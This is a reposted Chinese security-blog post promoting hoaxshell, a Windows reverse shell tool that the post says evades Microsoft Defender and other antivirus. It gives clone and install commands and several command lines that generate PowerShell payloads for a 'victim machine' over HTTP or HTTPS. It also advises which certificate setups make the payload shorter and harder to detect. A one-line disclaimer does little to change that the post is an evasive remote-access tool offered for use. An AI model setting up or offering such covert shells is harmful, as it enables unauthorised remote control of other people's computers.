神兵利器 - hoaxshell

admin
admin
admin
101400
文章
87
评论
2023年1月30日03:08:54评论56 views字数 1156阅读3分51秒阅读模式

===================================

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

oaxshell 是一个非常规的 Windows 反向 shell,目前未被 Microsoft Defender 和可能的其他 AV 解决方案检测到(查看PoC 表以获取更多信息),仅基于 http(s) 流量。该工具易于使用,它生成自己的 PowerShell 有效负载并支持加密 (ssl)。

神兵利器 – hoaxshell

0x02 安装与使用

1、安装方式

git clone https://github.com/t3l3machus/hoaxshellcd ./hoaxshellsudo pip3 install -r requirements.txtchmod +x hoaxshell.py
2、利用的有效载荷Invoke-Expression(默认)
 用于-x提供要在受害机器上创建的 .ps1 文件名(绝对路径)。您应该在执行之前检查原始有效负载,确保您提供的路径是可靠的。
sudo python3 hoaxshell.py -s <your_ip> -x "C:Users\$env:USERNAME.localhack.ps1"
3、加密的 shell 会话(https + 自签名证书)
这个特定的有效载荷是一个危险信号,因为它以一个额外的代码块开始,指示 PowerShell 跳过 SSL 证书检查,这使得它变得可疑且易于检测,并且长度明显更长。不建议。
# Generate self-signed certificate:openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 # Pass the cert.pem and key.pem as arguments:sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>
4、具有可信证书的加密 shell 会话
        如果您拥有一个域,请使用此选项通过向您的 DN 提供 -s 以及受信任的证书 (-c cert.pem -k privkey.pem) 来生成更短且不易检测的 https 有效负载。
sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>

0x03 项目链接下载

1、通过阅读原文,到项目地址下载

2、关注公众号"网络安全者",后台回复:20221104

神兵利器 – hoaxshell


原文始发于微信公众号(网络安全者):神兵利器 – hoaxshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月30日03:08:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   神兵利器 - hoaxshellhttps://cn-sec.com/archives/1390281.html

发表评论

匿名网友 填写信息